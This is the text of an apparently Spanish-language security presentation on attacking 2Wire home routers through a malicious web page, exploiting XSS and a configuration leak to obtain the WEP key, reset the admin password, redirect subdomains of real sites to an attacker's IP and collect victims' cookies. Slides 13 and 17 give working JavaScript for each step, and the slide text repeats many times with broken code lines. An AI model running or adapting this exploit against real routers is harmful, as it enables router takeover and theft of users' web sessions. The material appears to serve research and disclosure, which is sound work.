Descripción de un ataque a un ruteador 2Wire que muestra como es posible desde un ataque al ruteador, obtener los datos de sesión de sitios importantes. El ataque que se realiza es pharming pero de una manera especial, ya que no se redirigen las páginas para montar un scam o página falsa, si no que se redirigen subdominios de los dominios originales y se intenta, en ese momento, realizar las peticiones con el cliente a los sitios para obtener las cookies de los dominios originales.
Código completo y video en:
http://www.websec.mx/blog/ver/Robo_de_cookies_por_router_vulnerable_caso_2Wire
2. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
4. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
5. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
6. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
7. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
8. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
9. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
10. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
11. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
12. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
13. try { xmlhttp=new ActiveXObject("MSXML2.XMLHTTP"); } catch(e) {xmlhttp = new
XMLHttpRequest()}xmlhttp.open("GET","/xslt?page=mgmt_data",false);xmlhttp.send(
null);var info = xmlhttp.responseText;var pass = "temporal";var wep =
info.substr(info.indexOf("encrypt_key">0x")+15,10);document.getElementById('ea').
innerHTML += "<b>Configuración obtenida.</b><br>Parseando
WEP...<br><b>WEP:</b> "+wep+"<br>Cambiando el password a 'temporal'...<br>";
xmlhttp.open("POST","/xslt");xmlhttp.setRequestHeader("Content-
type","application/x-www-form-
urlencoded");xmlhttp.send("PAGE=A04_POST&THISPAGE=A04&NEXTPAGE=A04_POST
&SYSKEY="+wep+"&PASSWORD="+pass+"&PASSWORD_CONF="+pass+"&HINT="+pass
);document.getElementById('ea').innerHTML += "<b>Password 'temporal'
establecido.</b><br>Obteniendo sesión...<br>";
xmlhttp.open("GET","/xslt?PAGE=A02_POST&THISPAGE=&NEXTPAGE=J01&CMSKICK=
&PAGE=A02&NEXTPAGE=J01&SHOWHINT=1&PASSWORD="+pass, false);xmlhttp.send(
null);document.getElementById('ea').innerHTML += "<b>Sesion
obtenida.</b><br><b>Cookie: </b>"+document.cookie+"<br>Redirigiendo
subdominios...<br>";
Disponible en Routerpwn desde Junio 2011 !
14. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
16. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
17. for (var i=0; i<dominios.length; i++) {
dns=dominios[i];
xmlhttp.open("GET","/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME="+d
ns+"&ADDR="+ip,false);
xmlhttp.send(null);}document.getElementById('ea').innerHTML += "<b>Dominios
redirigidos.</b><br>Abriendo subdominios y enviando cookies...<br>";
for (var i=0; i<dominios.length; i++) {
dns=dominios[i];
document.write('<img src=http://'+dns+'>');}
document.getElementById('ea').innerHTML += "<b>Cookies enviadas.</b><br>Eliminando
redirecciones de subdominios...<br>";
for (var i=20; i<dominios.length+21; i++) {
xmlhttp.open("GET","/xslt?PAGE=J38_DEL&THISPAGE=J38&NEXTPAGE=J38_DEL&NAMEID="
+i,false);
xmlhttp.send(null);}document.getElementById('ea').innerHTML += "<b>Redirecciones
eliminadas.</b><br><br><b>FIN.</b> Que tengas un buen dia :)";
width=500 height=500>2wiro</iframe></body><html>
18. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
19. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.